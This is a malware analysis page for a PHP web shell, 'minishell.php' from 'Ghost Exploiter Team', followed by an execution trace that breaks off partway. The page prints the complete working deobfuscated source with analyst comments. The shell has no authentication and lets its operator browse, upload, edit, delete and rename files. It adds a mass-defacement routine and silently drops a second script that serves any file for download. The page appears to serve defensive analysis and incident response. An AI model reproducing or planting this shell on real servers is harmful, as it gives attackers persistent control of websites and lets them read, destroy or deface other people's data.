PHP Malware Analysis

minishell.php

md5: 79b040792073014da42ba6ae15097061


Screenshot


Attributes

Environment

Files

Input

Title

URLs


Deobfuscated PHP code

<!-- Hak Cipta Ghost Exploiter Team
Thanks All Member GhostExploiterTeam -->

<?php 
// Analyst note: request setup for the web shell. Nothing in the visible listing
// authenticates the caller before request parameters are acted on.
// $xNamashell is assigned here and not read again in the visible part of the listing.
$xNamashell = "b3p45.php";
// (author's comment, translated from Indonesian) fill in your file name
// Turn off all PHP error reporting so failures further down produce no visible output.
error_reporting(0);
// Clear the current output buffer; @ hides the notice raised when no buffer is active.
@ob_clean();
// The working directory comes straight from the `dir` query parameter with no
// validation; without it the shell starts in the process's current directory.
if (isset($_GET['dir'])) {
    $dir = $_GET['dir'];
} else {
    $dir = getcwd();
}
?>

<!DOCTYPE html>
<html>
<head>
	<title>Shell Bypass 403 GE-C666C</title>
</head>

<style>
@import url("https://fonts.googleapis.com/css?family=New+Rocker|Shadows+Into+Light&display=swap");
* {
	font-family: monospace;
	font-weight: 800;
}
body {
	font-size: 120%;
	color: #fff;
	padding: 0;
	margin: 25% 10% 10% 10%;
	background-color: #111;
	text-shadow: rgba(0,0,0,1) 2px 2px 0.1em;
}
table {
	margin: auto;
	margin-bottom: 20px;
	width: 96%;
}
table td {
	transition: all .5s;
}
.data-table {
	border-collapse: collapse;
	font-size: 110%;
	min-width: 600px;
}
.data-table th, 
.data-table td {
	border: none;
	padding: 7px 15px;
	width: 33%;
}
h3.title{
	margin-bottom: 20px;
	margin-top: 0px;
	text-align: left;
	background-color: #f00;
	padding: 10px;
	font-weight: 900;
	font-size: 160%;
	font-family: New Rocker;
}
.data-table tbody td {
	color: #fff;
	background-color: #282828;
}
.data-table tbody td:nth-child(4),
.data-table tbody td:last-child {
	text-align: left;
}
.data-table tbody td:first-child{
	text-align: left;
}
.data-table tbody tr:nth-child(odd) td {
	background-color: #222;
}
.data-table tbody tr:hover td {
	background-color: #151515;
	border-color: #ccc;
}
.data-table tbody tr.stamp td {
	color: #fff;
	background-color: #000;
}
.data-table tbody tr.data td.nick {
	color: #f00;
}
.kotak{
	border: 2px solid #f00;
	width: 100%;;
	border-radius: 6px;
	box-shadow: rgba(0,0,0,1) 3px 3px 5em;
	padding-bottom: 10px;
}
.btn{
	background-color: #f00;
	border-radius: 5px;
	border: 2px solid red;
	width: 75px;
	height: 27px;
	font-size: 0.8em;
	font-weight: 600;
	color: #fff;
	outline: none;
	margin: 4px;
	font-weight: 900;
	padding: 2px 3px;
	text-shadow: none;
}
.btn:hover{
	box-shadow: 0px 0px 2px 2px darkred;
}

a{
	color: #fff;
	text-decoration: none;
}
a:hover{
	color: #fff;
}
.nav_up{
	margin: 2%;;
	margin-top: 0px;
}
.stamp th{
	font-size: 140%;
}
.dirname{
	color: #f00;
}
.filename{
	color: #fff;
}
input.btn.mini{
	width: 35px;
	height: 24px;
}
.dirnav{
	margin-bottom: 20px;
}
.dirnav a{
	color: lime;
}
textarea{
	width: 95.5%;
	height: 400px;
}
.balik{
	margin-right: 200px;
}
.data-table th.det, 
.data-table td.det{
	width: 25%;
}
.fileinput{
	width: 100px;
}
.new{
	width: 160px;
}
.newf{
	width: 90px;
}
.hide{
	display: none;
}
.rmf{
	margin-right: -5px;
}
.go{
	background-color: green;
	border: none;
}
.go:hover{
	box-shadow: 0px 0px 2px 2px darkgreen;
}
.fitur{
	text-align: right;
	margin-top: -15px;
	margin-right: 1%;
}
.massarea{
	font-size: 60%;
	margin: 2%;
}
.mass{
	margin-left: 2%;
	margin-top: 1%;
	margin-right: 2%;
	font-size: 60%;
}
.massresult{
	margin-top: 8%;
	font-size: 80%;
	margin-left: 2%;
	text-align: left;
}
.inputmass{
	text-align: left;
}
.massbt{
	font-size: 60%;
}
.massform{
	margin-top: 6%;
}
.fbawah,.fatas{
	display: inline-block;
}
</style>
<body>
<div class="kotak">
	<h3 class="title">Ghost Exploiter Team Official</h3>
	<div class="fitur">
			<button type="button" class="btn massbt" onclick="display('tabel','massform')">Mass Deface</button>
	</div>
	<div class="nav_up">

<?php 
// Normalise backslashes to forward slashes so the path can be split on "/".
$dir = str_replace("\\", "/", $dir);
$dirs = explode("/", $dir);
// Breadcrumb navigation: every path component becomes a link to ?dir=<path up to it>.
// NOTE(analysis): components of the request-supplied path are echoed without HTML escaping.
foreach ($dirs as $key => $value) {
    // A leading empty component means an absolute path: open the heading with a root link.
    if ($value == "" && $key == 0) {
        echo "<h3 class=\"dirnav\">Directory >> <a href=\"/\">/</a>";
        continue;
    }
    echo "<a href=\"?dir=";
    // Rebuild the path prefix dirs[0..key] as this link's target.
    for ($i = 0; $i <= $key; $i++) {
        echo "{$dirs[$i]}";
        if ($key !== $i) {
            echo "/";
        }
    }
    echo '">' . $value . '</a>/';
}
echo "</h3>";
// Upload handler, triggered by the `upl` submit field. The uploaded file is moved into
// $dir under the client-supplied file name; no extension, content-type or size check is
// applied. $tempat, $error and $ukuranfile are assigned but not used in the visible code.
if (isset($_POST['upl'])) {
    $namafile = $_FILES['upload']['name'];
    $tempatfile = $_FILES['upload']['tmp_name'];
    $tempat = $_GET['dir'];
    $error = $_FILES['upload']['error'];
    $ukuranfile = $_FILES['upload']['size'];
    // The return value is ignored, so the alert below ("file terupload!", i.e. "file
    // uploaded!") is printed whether or not the move succeeded.
    move_uploaded_file($tempatfile, $dir . '/' . $namafile);
    echo "\n\t\t\t\t\t<script>alert('file terupload!');</script>\n\t\t\t\t\t";
}
?>
	<form method="post" enctype="multipart/form-data">
	<input type="file" name="upload">
	<input type="submit" name="upl" value="Upload">
	</form>
	</div>
<center>
<!--Mass Deface-->
<?php 
// Emits the initially hidden "Mass Deface" form: `pwd` (target root, pre-filled with
// $dir), `namasc` (file name) and `scdeface` (file content), submitted via `massdef`.
// The grey hint text is Indonesian for "change to document_root for mass deface".
// NOTE(analysis): $dir is interpolated into the value attribute without HTML escaping.
echo "\n\t<form method='post' class='hide massform' id='massform'>\n\t<font color='#f00' size='6px'>Mass Deface Auto Detect Domain</font><br><br><br>\n\t\t<div class='inputmass'>\n\t\t<input class='mass' type='text' name='pwd' size='50' value='{$dir}'><font color='silver' size='1px'>/*Ubah Ke document_root untuk mass deface*/</font><br>\n\t\t<input class='mass' type='text' name='namasc' size='50' placeholder='namafile.ext'><br>\n\t\t</div>\n\t\t<textarea name='scdeface' width='400px' placeholder='scdeface' class='massarea'></textarea>\n\t\t<input type='submit' name='massdef' value='Start' class='btn edt'><br>\n\t</form>";
?>
<!--Table-->
	<table class="data-table" id="tabel">
		<thead>
			<tr class="stamp">
				<th>File / Folder</th>
				<th>Size</th>
				<th>Action</th>
			</tr>
		</thead>
		<tbody>
		<tr>
			<td style="color: lime">.</td>
			<td style="color: lime"><center>-</center></td>
			<td><center>
			<div id="divneww" style="display:none">
			<form method="POST">
			<input name="createname" class="fileinput new" type="text" size="20" placeholder="nama" required/>
			<select name="type">
				<option disabled="disabled" selected="selected">type</option>
				<option value="file">file</option>
				<option value="dir">dir</option>
			</select>
			<input type="submit" value="Go" class="btn mini go" name="createnew"/>
			</form>
			</div>
			<?php 
// Button that swaps itself for the create-file/dir form (element id "divneww").
// display() is a client-side helper; its definition is not in the visible listing.
echo "<div id=\"divnew\"><button class=\"btn newf\" onclick='display(\"divnew\",\"divneww\")'>+File/Dir</button></div>";
?>
			</center>
			</td>
		</tr>
	<?php 
// Enumerate the request-selected directory. The result is not checked; with error
// reporting disabled at the top of the script, a failed scandir() is silent.
$scan = scandir($dir);
// First pass: one table row per sub-directory ("." and ".." are skipped).
// NOTE(analysis): $dir and entry names are concatenated into HTML attributes unescaped.
foreach ($scan as $directory) {
    if (!is_dir($dir . '/' . $directory) || $directory == '.' || $directory == '..') {
        continue;
    }
    // Name cell: link that re-enters the shell with ?dir= pointing at the sub-directory.
    echo '
	<tr class="data">
	<td class="det">
	<a class="dirname" href="?dir=' . $dir . '/' . $directory . '">' . dirlimit($directory) . '</a>
	</td>
	<td style="color: red;"><center>--</center></td>
	<td>
	<center>';
    // Hidden rename form: posts `newname`, `path` and `oldname` to the rename handler.
    echo '<form method="POST" id="' . clearspace($directory) . '_form" class="hide">
	<input name="newname" class="fileinput" type="text" size="20" value="' . $directory . '" required/>
	<input type="hidden" name="path" value="' . $dir . '">
	<input type="hidden" name="oldname" value="' . $directory . '">
	<input type="submit" value="Go" class="btn mini go"/>
	</form>';
    // Delete form: posts `dirdl` (full path), `dirpath` and `rmdir` to the rmdir handler.
    echo '<div id="' . clearspace($directory) . '_link">
	<form method="post">
	<input type="hidden" value="' . $dir . '/' . $directory . '" name="dirdl">
	<input type="hidden" value="' . $dir . '" name="dirpath">
	<input type="submit" value="del" name="rmdir" class="btn mini">';
    // "ren" toggles between the action buttons and the rename form above.
    echo '<a class="btn" href=\'javascript:display("' . clearspace($directory) . '_link","' . clearspace($directory) . '_form");\'>ren</a>';
    echo "</form>\n\t</div>\n\t</center>\n\t</td>\n\t</tr>\n\t";
}
// Second pass over the same listing: one table row per regular file.
// NOTE(analysis): $dir and file names are concatenated into HTML attributes unescaped.
foreach ($scan as $file) {
    if (!is_file($dir . '/' . $file)) {
        continue;
    }
    // Human-readable size: KB rounded to 3 decimals, switching to MB from 1024 KB up.
    $jumlah = filesize($dir . '/' . $file) / 1024;
    $jumlah = round($jumlah, 3);
    if ($jumlah >= 1024) {
        $jumlah = round($jumlah / 1024, 2) . 'MB';
    } else {
        $jumlah .= 'KB';
    }
    // Name cell: link to the file viewer (?dir=...&open=<file>).
    echo '
	<tr>
	<td><a class="filename" href="?dir=' . $dir . '&open=' . $file . '">' . wordlimit($file) . '</a></td>
	<td style="color: lime;"><center>' . $jumlah . '</center></td>
	<td><center>';
    // Hidden rename form: posts `newname`, `path` and `oldname` to the rename handler.
    echo '<form method="POST" id="' . clearfile($file) . '_form" class="hide">
	<input name="newname" class="fileinput" type="text" size="20" value="' . $file . '" required/>
	<input type="hidden" name="path" value="' . $dir . '">
	<input type="hidden" name="oldname" value="' . $file . '">
	<input type="submit" value="Go" class="btn mini go"/>
	</form>';
    // Delete form (`filedl`, `filepath`, `rmfile`) plus the "edt" link to the editor (&ubah=).
    echo '
	<div id="' . clearfile($file) . '_link">
	<form method="post" class="fatas">
	<input type="hidden" value="' . $dir . '/' . $file . '" name="filedl">
	<input type="hidden" value="' . $dir . '" name="filepath">
	<input type="submit" value="del" name="rmfile" class="btn mini rmf">
	<a href="?dir=' . $dir . '&ubah=' . $file . '" class="btn">edt</a>';
    echo '<a class="btn" href=\'javascript:display("' . clearfile($file) . '_link","' . clearfile($file) . '_form");\'>ren</a>';
    // Download form: posts `dlpath`/`dlname` to fdl.php, the helper script this shell
    // writes to disk near the end of the listing.
    echo '</form><form action="fdl.php" method="post" class="fbawah">
	<input type="hidden" value="' . $dir . '" name="dlpath">
	<input type="hidden" value="' . $file . '" name="dlname">
	<input type="submit" value="dl" name="dlfile" class="btn mini rmf">
	</form></div></center>
	</td>
	</tr>
	';
}
echo "\n\t</tbody>\n\t</table>\n";
/*action*/
// File viewer: hides the listing table and prints the contents of
// <dir>/<open>, both taken from the query string. The path is not validated, so the
// readable scope is whatever the PHP process (and any open_basedir setting) allows.
// The file contents are the one value in this listing passed through htmlspecialchars().
if (isset($_GET['open'])) {
    echo '
	<br />
	<style>
		table{
			display: none;
		}
	</style>
	<textarea>' . htmlspecialchars(file_get_contents($_GET['dir'] . '/' . $_GET['open'])) . '</textarea>
	';
}
// File delete handler: unlinks the path given in POST `filedl` as-is (no check that it
// lies under the listed directory), then redirects back to `filepath` on success.
// NOTE(analysis): `filepath` is written into the inline script without escaping.
if (isset($_POST['rmfile'])) {
    if (unlink($_POST['filedl'])) {
        echo "<script>alert('Delete Ok !');window.location='?dir=" . $_POST['filepath'] . "';</script>";
    }
}
// Directory delete handler: removes the regular files matched by <dirdl>/* and then
// the directory itself. Sub-directories are not descended into, so rmdir() fails (and
// the "err" alert is shown) when any remain — files already unlinked stay deleted.
// NOTE(analysis): `dirpath` and `dirdl` are written into inline scripts without escaping.
if (isset($_POST['rmdir'])) {
    $files = glob('' . $_POST['dirdl'] . '/*');
    foreach ($files as $file) {
        if (is_file($file)) {
            unlink($file);
            // delete file
        }
    }
    if (rmdir($_POST['dirdl'])) {
        echo "<script>alert('Delete Ok !');window.location='?dir=" . $_POST['dirpath'] . "';</script>";
    } else {
        echo "<script>alert('err " . $_POST['dirdl'] . "!');</script>";
    }
}
// File editor ("ubah" is Indonesian for "change"). With POST `edit` present the
// submitted text overwrites the file named by POST `object`; afterwards the edit form
// for <dir>/<ubah> is rendered with the file's current contents.
if (isset($_GET['ubah'])) {
    if (isset($_POST['edit'])) {
        // The write target is the hidden `object` field, not the dir/ubah query values,
        // and the fopen() result is not checked before use.
        $fp = fopen($_POST['object'], 'w');
        // fwrite() returns 0 for empty content, which takes the err() branch here.
        if (fwrite($fp, $_POST['edit'])) {
            echo "<script>alert('Edit Ok !');window.location='?dir=" . $_GET['dir'] . "';</script>";
        } else {
            err();
        }
        fclose($fp);
    }
    $hell = $_GET['dir'];
    $yeah = $_GET['ubah'];
    $patc = "{$hell}/{$yeah}";
    // Edit form: file contents are HTML-escaped, but $patc and $dir are placed in
    // attributes unescaped.
    echo '<style>
			table {
				display: none;
			}
		</style>

		<form method="post" action="">
		<input type="hidden" name="object" value="' . $patc . '">
		<textarea name="edit">' . htmlspecialchars(file_get_contents($patc)) . '</textarea>
		<a href="?dir=' . $dir . '" class="balik"><=Back</a>
		<button type="submit" name="go" value="Submit" class="btn edt">Liking</button>
		</form>
		';
}
// Rename handler: renames <path>/<oldname> to <path>/<newname>, all three values taken
// from POST without validation, then reports the outcome through ok()/err().
if (isset($_POST['newname'])) {
    if (rename($_POST['path'] . '/' . $_POST['oldname'], $_POST['path'] . '/' . $_POST['newname'])) {
        ok();
    } else {
        err();
    }
}
// Create handler: makes an empty file or a directory named by POST `createname`
// inside $dir, depending on POST `type`.
if (isset($_POST['createnew']) && $_POST['createname'] != '') {
    if ($_POST['type'] == 'file') {
        $newfl = $dir . '/' . $_POST['createname'];
        // Always true: $newfl was assigned on the previous line.
        if (isset($newfl)) {
            // Opening in 'w' mode creates (or truncates) the file; the handle is never closed.
            if (fopen($newfl, 'w')) {
                ok();
            } else {
                err();
            }
        }
    } elseif ($_POST['type'] == 'dir') {
        $newdir = $dir . '/' . $_POST['createname'];
        if (mkdir($newdir)) {
            ok();
        } else {
            err();
        }
    } else {
        // 'Pilih type !' is Indonesian for "Choose a type!".
        echo "<script>alert('Pilih type !');</script>";
    }
}
// Mass-defacement handler. Writes the submitted content (`scdeface`) to a file named
// by `namasc`, relative to the process's working directory, then tries to copy that
// file into every entry of the directory given in `pwd`.
// Incident-response note: a run of this handler leaves the same file name and content
// in many sibling directories at once, which is a useful pivot when scoping damage.
if (isset($_POST['massdef'])) {
    echo "<style>\n\t\t\ttable {\n\t\t\t\tdisplay: none;\n\t\t\t}\n\t\t</style>";
    $nama = $_POST['namasc'];
    $sc = $_POST['scdeface'];
    // fopen() result is not checked before the write.
    $bikin = fopen($nama, "w");
    fwrite($bikin, $sc);
    fclose($bikin);
    $root = $_POST['pwd'];
    $scan = scandir($root);
    echo "<div class='massresult'>";
    echo "<font color='lime'>[ DETECTED DOMAINS ] : </font><br><br><textarea>";
    foreach ($scan as $a) {
        // Overwrites the global $dir with the bare entry name.
        $dir = $a;
        $full = $root . '/' . $a . '/' . $nama;
        // @ hides copy failures (entries that are not writable directories).
        $ekse = @copy($nama, $full);
        if ($ekse) {
            /* a bit of filtering :v */
            // Only entries whose name looks like "word.tld" are reported as URLs;
            // the copy itself has already happened regardless of this match.
            if (preg_match('/[\\w]+[.]+[a-z]+/i', $dir, $match)) {
                echo "http://{$dir}/{$nama}\n";
            }
        }
    }
    // Footer text is Indonesian, roughly: "if any dir/domain was not detected, fill it in yourself".
    echo "\n\nNB : Kalo ada dir/domain yang gak terdetect isi sendiri yak :v\nPutra Gans tq</textarea>";
    echo "</div>";
}
// Runs on every request, whatever the parameters: (re)writes a second script,
// fdl.php, via a relative path (the sandbox trace on this page records a 275-byte write).
// The dropped script streams the file named by POST `dlpath`/`dlname` back to the
// client as an attachment and has no access check of its own.
// Clean-up note: removing only the main shell leaves this file-read helper behind, so
// treat fdl.php as a companion artifact of this sample.
$fdlvalue = '<?php  
$file_url = $_POST["dlpath"]."/".$_POST["dlname"];  
header("Content-Type: application/octet-stream");  
header("Content-Transfer-Encoding: utf-8");   
header("Content-disposition: attachment; filename=\\"" . basename($file_url) . "\\"");   
readfile($file_url);  
?>  ';
// None of the three calls below has its result checked.
$dlwrite = fopen('fdl.php', 'w');
fwrite($dlwrite, $fdlvalue);
fclose($dlwrite);
/*function*/
/**
 * Shortens a file name for display in the listing table.
 *
 * Names longer than $limit bytes (strlen) are cut to $limit - 3 characters
 * (mb_substr) and suffixed with a red "..." <font> element; shorter names are
 * returned unchanged. The name is not HTML-escaped before being returned.
 *
 * @param string $file  File name, as passed from the scandir() loop.
 * @param int    $limit Length above which the name is truncated (default 26).
 * @return string HTML fragment for the file-name cell.
 */
function wordlimit($file, $limit = 26)
{
    if (strlen($file) > $limit) {
        $word = mb_substr($file, 0, $limit - 3) . "<font color=#f00>...</font>";
    } else {
        $word = $file;
    }
    return $word;
}
/**
 * Shortens a directory name for display in the listing table.
 *
 * Same logic as wordlimit() with a different default limit and a white "..."
 * suffix: names longer than $limit bytes are cut to $limit - 3 characters.
 * The name is not HTML-escaped before being returned.
 *
 * @param string $directory Directory name, as passed from the scandir() loop.
 * @param int    $limit     Length above which the name is truncated (default 22).
 * @return string HTML fragment for the directory-name cell.
 */
function dirlimit($directory, $limit = 22)
{
    if (strlen($directory) > $limit) {
        $dirlim = mb_substr($directory, 0, $limit - 3) . "<font color=#fff>...</font>";
    } else {
        $dirlim = $directory;
    }
    return $dirlim;
}
/**
 * Reports success to the operator: emits an inline script that shows the alert
 * 'Berhasil !' (Indonesian for "Success!") and then navigates to the current URL.
 */
function ok()
{
    echo "<script>alert('Berhasil !');window.location='';</script>";
}
/**
 * Reports failure to the operator: emits an inline script that shows the alert
 * 'Gagal !' (Indonesian for "Failed!") and then navigates to the current URL.
 */
function err()
{
    echo "<script>alert('Gagal !');window.location='';</script>";
}
/**
 * Replaces spaces with underscores so a directory name can be used inside the
 * element ids built in the listing loop. Only spaces are replaced; other
 * characters pass through unchanged and unescaped.
 *
 * @param string $directory Directory name.
 * @return string Name with " " replaced by "_".
 */
function clearspace($directory)
{
    return str_replace(" ", "_", $directory);
}
/**
 * Replaces spaces with underscores so a file name can be used inside the element
 * ids built in the listing loop. Body is identical to clearspace(); only spaces
 * are replaced, other characters pass through unchanged and unescaped.
 *
 * @param string $file File name.
 * @return string Name with " " replaced by "_".
 */
function clearfile($file)
{
    return str_replace(" ", "_", $file);
}
?>
<!--Logger-->

<script type="text/jav

Execution traces

data/traces/79b040792073014da42ba6ae15097061_trace-1676259828.2349.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:44:14.132716]
1	0	1	0.000145	393528
1	3	0	0.000469	454552	{main}	1		/var/www/html/uploads/minishell.php	0	0
1		A						/var/www/html/uploads/minishell.php	6	$xNamashell = 'b3p45.php'
2	4	0	0.000503	454552	error_reporting	0		/var/www/html/uploads/minishell.php	8	1	0
2	4	1	0.000517	454592
2	4	R			22527
2	5	0	0.000531	454552	ob_clean	0		/var/www/html/uploads/minishell.php	9	0
2	5	1	0.000544	454552
2	5	R			TRUE
2	6	0	0.000557	454552	getcwd	0		/var/www/html/uploads/minishell.php	14	0
2	6	1	0.000570	454600
2	6	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/minishell.php	14	$dir = '/var/www/html/uploads'
2	7	0	0.000597	454600	str_replace	0		/var/www/html/uploads/minishell.php	224	3	'\\'	'/'	'/var/www/html/uploads'
2	7	1	0.000613	454696
2	7	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/minishell.php	224	$dir = '/var/www/html/uploads'
2	8	0	0.000638	454600	explode	0		/var/www/html/uploads/minishell.php	225	2	'/'	'/var/www/html/uploads'
2	8	1	0.000653	455176
2	8	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/minishell.php	225	$dirs = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/minishell.php	227	$key = 0
1		A						/var/www/html/uploads/minishell.php	227	$key = 1
1		A						/var/www/html/uploads/minishell.php	232	$i = 0
1		A						/var/www/html/uploads/minishell.php	232	$i++
1		A						/var/www/html/uploads/minishell.php	232	$i++
1		A						/var/www/html/uploads/minishell.php	227	$key = 2
1		A						/var/www/html/uploads/minishell.php	232	$i = 0
1		A						/var/www/html/uploads/minishell.php	232	$i++
1		A						/var/www/html/uploads/minishell.php	232	$i++
1		A						/var/www/html/uploads/minishell.php	232	$i++
1		A						/var/www/html/uploads/minishell.php	227	$key = 3
1		A						/var/www/html/uploads/minishell.php	232	$i = 0
1		A						/var/www/html/uploads/minishell.php	232	$i++
1		A						/var/www/html/uploads/minishell.php	232	$i++
1		A						/var/www/html/uploads/minishell.php	232	$i++
1		A						/var/www/html/uploads/minishell.php	232	$i++
1		A						/var/www/html/uploads/minishell.php	227	$key = 4
1		A						/var/www/html/uploads/minishell.php	232	$i = 0
1		A						/var/www/html/uploads/minishell.php	232	$i++
1		A						/var/www/html/uploads/minishell.php	232	$i++
1		A						/var/www/html/uploads/minishell.php	232	$i++
1		A						/var/www/html/uploads/minishell.php	232	$i++
1		A						/var/www/html/uploads/minishell.php	232	$i++
2	9	0	0.000889	455216	scandir	0		/var/www/html/uploads/minishell.php	303	1	'/var/www/html/uploads'
2	9	1	0.000922	455840
2	9	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'minishell.php', 5 => 'prepend.php']
1		A						/var/www/html/uploads/minishell.php	303	$scan = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'minishell.php', 5 => 'prepend.php']
2	10	0	0.000959	455856	is_dir	0		/var/www/html/uploads/minishell.php	306	1	'/var/www/html/uploads/.'
2	10	1	0.000975	455920
2	10	R			TRUE
2	11	0	0.000989	455888	is_dir	0		/var/www/html/uploads/minishell.php	306	1	'/var/www/html/uploads/..'
2	11	1	0.001004	455936
2	11	R			TRUE
2	12	0	0.001017	455896	is_dir	0		/var/www/html/uploads/minishell.php	306	1	'/var/www/html/uploads/.htaccess'
2	12	1	0.001032	455936
2	12	R			FALSE
2	13	0	0.001045	455896	is_dir	0		/var/www/html/uploads/minishell.php	306	1	'/var/www/html/uploads/data'
2	13	1	0.001059	455936
2	13	R			TRUE
2	14	0	0.001076	455968	dirlimit	1		/var/www/html/uploads/minishell.php	311	2	'data'	???
2		A						/var/www/html/uploads/minishell.php	522	$dirlim = 'data'
2	14	1	0.001119	455968
2	14	R			'data'
2	15	0	0.001134	455840	clearspace	1		/var/www/html/uploads/minishell.php	316	1	'data'
3	16	0	0.001147	455840	str_replace	0		/var/www/html/uploads/minishell.php	532	3	' '	'_'	'data'
3	16	1	0.001161	455936
3	16	R			'data'
2	15	1	0.001175	455840
2	15	R			'data'
2	17	0	0.001188	455840	clearspace	1		/var/www/html/uploads/minishell.php	322	1	'data'
3	18	0	0.001201	455840	str_replace	0		/var/www/html/uploads/minishell.php	532	3	' '	'_'	'data'
3	18	1	0.001214	455936
3	18	R			'data'
2	17	1	0.001233	455840
2	17	R			'data'
2	19	0	0.001246	455840	clearspace	1		/var/www/html/uploads/minishell.php	327	1	'data'
3	20	0	0.001259	455840	str_replace	0		/var/www/html/uploads/minishell.php	532	3	' '	'_'	'data'
3	20	1	0.001272	455936
3	20	R			'data'
2	19	1	0.001285	455840
2	19	R			'data'
2	21	0	0.001298	455920	clearspace	1		/var/www/html/uploads/minishell.php	327	1	'data'
3	22	0	0.001310	455920	str_replace	0		/var/www/html/uploads/minishell.php	532	3	' '	'_'	'data'
3	22	1	0.001323	456016
3	22	R			'data'
2	21	1	0.001336	455920
2	21	R			'data'
2	23	0	0.001349	455904	is_dir	0		/var/www/html/uploads/minishell.php	306	1	'/var/www/html/uploads/minishell.php'
2	23	1	0.001365	455952
2	23	R			FALSE
2	24	0	0.001378	455912	is_dir	0		/var/www/html/uploads/minishell.php	306	1	'/var/www/html/uploads/prepend.php'
2	24	1	0.001393	455952
2	24	R			FALSE
2	25	0	0.001406	455896	is_file	0		/var/www/html/uploads/minishell.php	336	1	'/var/www/html/uploads/.'
2	25	1	0.001421	455920
2	25	R			FALSE
2	26	0	0.001434	455888	is_file	0		/var/www/html/uploads/minishell.php	336	1	'/var/www/html/uploads/..'
2	26	1	0.001448	455936
2	26	R			FALSE
2	27	0	0.001461	455896	is_file	0		/var/www/html/uploads/minishell.php	336	1	'/var/www/html/uploads/.htaccess'
2	27	1	0.001475	455936
2	27	R			TRUE
2	28	0	0.001488	455896	filesize	0		/var/www/html/uploads/minishell.php	338	1	'/var/www/html/uploads/.htaccess'
2	28	1	0.001502	455936
2	28	R			64
1		A						/var/www/html/uploads/minishell.php	338	$jumlah = 0.0625
2	29	0	0.001526	455840	round	0		/var/www/html/uploads/minishell.php	339	2	0.0625	3
2	29	1	0.001540	455912
2	29	R			0.063
1		A						/var/www/html/uploads/minishell.php	339	$jumlah = 0.063
1		A						/var/www/html/uploads/minishell.php	343	$jumlah = '0.063KB'
2	30	0	0.001575	455984	wordlimit	1		/var/www/html/uploads/minishell.php	348	2	'.htaccess'	???
2		A						/var/www/html/uploads/minishell.php	515	$word = '.htaccess'
2	30	1	0.001599	455984
2	30	R			'.htaccess'
2	31	0	0.001613	455872	clearfile	1		/var/www/html/uploads/minishell.php	351	1	'.htaccess'
3	32	0	0.001626	455872	str_replace	0		/var/www/html/uploads/minishell.php	535	3	' '	'_'	'.htaccess'
3	32	1	0.001639	455968
3	32	R			'.htaccess'
2	31	1	0.001653	455872
2	31	R			'.htaccess'
2	33	0	0.001667	455872	clearfile	1		/var/www/html/uploads/minishell.php	358	1	'.htaccess'
3	34	0	0.001680	455872	str_replace	0		/var/www/html/uploads/minishell.php	535	3	' '	'_'	'.htaccess'
3	34	1	0.001693	455968
3	34	R			'.htaccess'
2	33	1	0.001707	455872
2	33	R			'.htaccess'
2	35	0	0.001721	455872	clearfile	1		/var/www/html/uploads/minishell.php	364	1	'.htaccess'
3	36	0	0.001733	455872	str_replace	0		/var/www/html/uploads/minishell.php	535	3	' '	'_'	'.htaccess'
3	36	1	0.001747	455968
3	36	R			'.htaccess'
2	35	1	0.001760	455872
2	35	R			'.htaccess'
2	37	0	0.001773	455968	clearfile	1		/var/www/html/uploads/minishell.php	364	1	'.htaccess'
3	38	0	0.001786	455968	str_replace	0		/var/www/html/uploads/minishell.php	535	3	' '	'_'	'.htaccess'
3	38	1	0.001799	456064
3	38	R			'.htaccess'
2	37	1	0.001812	455968
2	37	R			'.htaccess'
2	39	0	0.001826	455928	is_file	0		/var/www/html/uploads/minishell.php	336	1	'/var/www/html/uploads/data'
2	39	1	0.001841	455968
2	39	R			FALSE
2	40	0	0.001854	455936	is_file	0		/var/www/html/uploads/minishell.php	336	1	'/var/www/html/uploads/minishell.php'
2	40	1	0.001868	455984
2	40	R			TRUE
2	41	0	0.001881	455944	filesize	0		/var/www/html/uploads/minishell.php	338	1	'/var/www/html/uploads/minishell.php'
2	41	1	0.001894	455984
2	41	R			12288
1		A						/var/www/html/uploads/minishell.php	338	$jumlah = 12
2	42	0	0.001916	455848	round	0		/var/www/html/uploads/minishell.php	339	2	12	3
2	42	1	0.001929	455920
2	42	R			12
1		A						/var/www/html/uploads/minishell.php	339	$jumlah = 12
1		A						/var/www/html/uploads/minishell.php	343	$jumlah = '12KB'
2	43	0	0.001963	455992	wordlimit	1		/var/www/html/uploads/minishell.php	348	2	'minishell.php'	???
2		A						/var/www/html/uploads/minishell.php	515	$word = 'minishell.php'
2	43	1	0.001991	455992
2	43	R			'minishell.php'
2	44	0	0.002005	455880	clearfile	1		/var/www/html/uploads/minishell.php	351	1	'minishell.php'
3	45	0	0.002018	455880	str_replace	0		/var/www/html/uploads/minishell.php	535	3	' '	'_'	'minishell.php'
3	45	1	0.002032	455976
3	45	R			'minishell.php'
2	44	1	0.002046	455880
2	44	R			'minishell.php'
2	46	0	0.002061	455880	clearfile	1		/var/www/html/uploads/minishell.php	358	1	'minishell.php'
3	47	0	0.002073	455880	str_replace	0		/var/www/html/uploads/minishell.php	535	3	' '	'_'	'minishell.php'
3	47	1	0.002087	455976
3	47	R			'minishell.php'
2	46	1	0.002101	455880
2	46	R			'minishell.php'
2	48	0	0.002114	455880	clearfile	1		/var/www/html/uploads/minishell.php	364	1	'minishell.php'
3	49	0	0.002126	455880	str_replace	0		/var/www/html/uploads/minishell.php	535	3	' '	'_'	'minishell.php'
3	49	1	0.002140	455976
3	49	R			'minishell.php'
2	48	1	0.002153	455880
2	48	R			'minishell.php'
2	50	0	0.002166	455976	clearfile	1		/var/www/html/uploads/minishell.php	364	1	'minishell.php'
3	51	0	0.002179	455976	str_replace	0		/var/www/html/uploads/minishell.php	535	3	' '	'_'	'minishell.php'
3	51	1	0.002192	456072
3	51	R			'minishell.php'
2	50	1	0.002205	455976
2	50	R			'minishell.php'
2	52	0	0.002219	455944	is_file	0		/var/www/html/uploads/minishell.php	336	1	'/var/www/html/uploads/prepend.php'
2	52	1	0.002234	455984
2	52	R			TRUE
2	53	0	0.002247	455944	filesize	0		/var/www/html/uploads/minishell.php	338	1	'/var/www/html/uploads/prepend.php'
2	53	1	0.002260	455984
2	53	R			57
1		A						/var/www/html/uploads/minishell.php	338	$jumlah = 0.0556640625
